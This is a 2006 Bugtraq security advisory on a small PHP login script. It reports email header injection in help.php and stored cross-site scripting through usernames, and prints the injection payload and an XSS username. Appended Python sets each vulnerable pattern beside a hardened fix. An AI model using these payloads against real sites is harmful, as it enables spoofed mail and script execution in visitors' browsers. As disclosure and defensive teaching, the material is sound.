Message-ID: <20060502143300.27321.qmail@securityfocus.com>
Date: 2 May 2006 14:33:00 -0000
From: zerogue@...il.com
To: bugtraq@...urityfocus.com
Subject: Russcom.net Loginphp multiple vulnerabilities


Russcom.net Loginphp multiple vulnerabilities

Discovered by: Nomenumbra
Date: 5/2/2006
Impact: moderate (privilege escalation, possible defacement)

Russcom.net's loginphp script is a small user management script:
Users can sign up for a username which they can use to log in to the password-protected main page.
The administrator can delete users and can also edit the main page.
The script includes the members and help pages.

It is possible to send spoofed mails in MIME format through help.php due to improper filtering:

The PHP mail() function is used like:

mail([RECIPIENT],[SUBJECT],[MESSAGE],[EXTRAHEADERS], [EXTRAPARAMS]); 

Header lines are separated by newlines (RFC 822), so a URL-encoded line feed (%0A) in the From value lets us inject a complete message in MIME format like this:

haxor@...ack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0AMy%20Message.%0A--frog--

to get this message (the script's own body ends up after the closing boundary, where MIME-aware clients ignore it as an epilogue):

To: recip@...t.xxx
Subject: Visit www.website.xxx !
From: haxor@...ack.xxx
Content-Type:multipart/mixed; boundary=frog;
--frog
Content-Type:text/html

My Message.
--frog--

Hello,
A friend thought you might want to see this page : www.website.xxx.
Bye Bye

for more information: http://www.securephpwiki.com/index.php/Email_Injection
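As an added illustration (not code from the advisory, from Russcom.net's loginphp script, or from PHP itself), the Python below mirrors the unfiltered mail() pattern described above: the user-supplied From value is pasted straight into the header block, and a payload of the form shown in the advisory is decoded and fed in. The result is parsed with the standard email module to show that the receiving side sees a multipart/mixed message whose only part is the attacker's text/html body. The hardened builder beside it refuses any header value containing CR or LF, which is the check the script is missing. The addresses, subject, body text and function names are constructed for the example.

```python
import email
from email import policy
from urllib.parse import unquote


# Constructed sample values for the demonstration (reserved .test domains,
# not the advisory's addresses).
RECIPIENT = "recip@site.test"
SUBJECT = "Visit www.website.test !"
BODY = ("Hello,\n"
        "A friend thought you might want to see this page : www.website.test.\n"
        "Bye Bye\n")

# URL-encoded From value of the kind shown in the advisory: an address, then
# %0A (line feed) and a complete injected MIME structure.
INJECTED_FROM = ("haxor@attack.test%0AContent-Type:multipart/mixed;%20boundary=frog;"
                 "%0A--frog%0AContent-Type:text/html%0A%0AMy%20Message.%0A--frog--")


def build_message_vulnerable(to, subject, body, from_addr):
    """Mirror of the PHP pattern mail($to, $subject, $body, "From: $from")
    with no filtering: the extra-headers string is pasted in verbatim."""
    extra_headers = "From: " + from_addr
    return "To: %s\nSubject: %s\n%s\n\n%s" % (to, subject, extra_headers, body)


class HeaderInjection(ValueError):
    """Raised when a caller-controlled header value contains a line break."""


def check_header_value(name, value):
    """A single-line header value never legitimately contains CR or LF;
    either one would start a new header (or the body) in the raw message."""
    if "\r" in value or "\n" in value:
        raise HeaderInjection("newline in %s header" % name)
    return value


def build_message_hardened(to, subject, body, from_addr):
    """Same construction, but every caller-controlled header is checked first."""
    for name, value in (("To", to), ("Subject", subject), ("From", from_addr)):
        check_header_value(name, value)
    return build_message_vulnerable(to, subject, body, from_addr)


def parse(raw):
    """Parse the raw text the way a receiving MUA would."""
    return email.message_from_string(raw, policy=policy.default)


def demo_injection():
    """Build the message from the injected From value and report what a
    MIME parser makes of it: (outer content type, part count,
    first part's content type, first part's body)."""
    raw = build_message_vulnerable(RECIPIENT, SUBJECT, BODY, unquote(INJECTED_FROM))
    msg = parse(raw)
    parts = msg.get_payload() if msg.is_multipart() else []
    first = parts[0] if parts else None
    return (msg.get_content_type(), len(parts),
            first.get_content_type() if first else None,
            first.get_payload() if first else None)


def demo_hardened():
    """True if the hardened builder rejects the same injected From value."""
    try:
        build_message_hardened(RECIPIENT, SUBJECT, BODY, unquote(INJECTED_FROM))
    except HeaderInjection:
        return True
    return False


if __name__ == "__main__":
    print(demo_injection())   # the injected text/html part is all the client shows
    print(demo_hardened())    # the CR/LF check stops it
```

Rejecting rather than stripping is deliberate: a value with a newline in it is never a valid address, so there is nothing worth salvaging, and silently stripping can leave a payload that still parses differently at the MTA.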

In the register function you can sign up with a username such as:

<script>alert('xss')</script>

The input is not sanitized, so any XSS payload of up to 30 characters can be stored, and anyone who visits the page displaying all users will get XSS'd (potentially cookies stolen).
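As an added illustration (not the loginphp script's code), the Python below shows why the 30-character limit is no defence: a registration stand-in that enforces only the length check accepts the 29-character payload from the advisory, the vulnerable user-list page interpolates it unchanged, and the hardened page neutralises it by HTML-escaping each name at output time. The function names and the sample user are constructed for the example.

```python
import html

MAX_USERNAME_LEN = 30                             # the limit the advisory mentions
XSS_PAYLOAD = "<script>alert('xss')</script>"     # 29 characters, so it passes


def register(users, username):
    """Constructed stand-in for the script's register function: it applies
    only the length limit and stores the name verbatim."""
    if not 0 < len(username) <= MAX_USERNAME_LEN:
        return False
    users.append(username)
    return True


def render_user_list_vulnerable(users):
    """Stored XSS: stored names are interpolated into the HTML unescaped."""
    return "<ul>" + "".join("<li>%s</li>" % u for u in users) + "</ul>"


def render_user_list_hardened(users):
    """Same page with output encoding: <, >, &, quotes become entities, so
    the browser renders the payload as text instead of executing it."""
    return "<ul>" + "".join("<li>%s</li>" % html.escape(u, quote=True)
                            for u in users) + "</ul>"


def demo():
    """Register a normal user and the payload, then render both pages.
    Returns (payload accepted?, vulnerable HTML, hardened HTML)."""
    users = []
    register(users, "alice")
    accepted = register(users, XSS_PAYLOAD)
    return accepted, render_user_list_vulnerable(users), render_user_list_hardened(users)


if __name__ == "__main__":
    accepted, vulnerable_page, hardened_page = demo()
    print(accepted)
    print(vulnerable_page)
    print(hardened_page)
```

Escaping belongs at the point of output, not only at registration: the same stored name may later be written into an attribute, a JavaScript string or an admin page, and each context needs its own encoding.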

Nomenumbra/[0x4F4C]

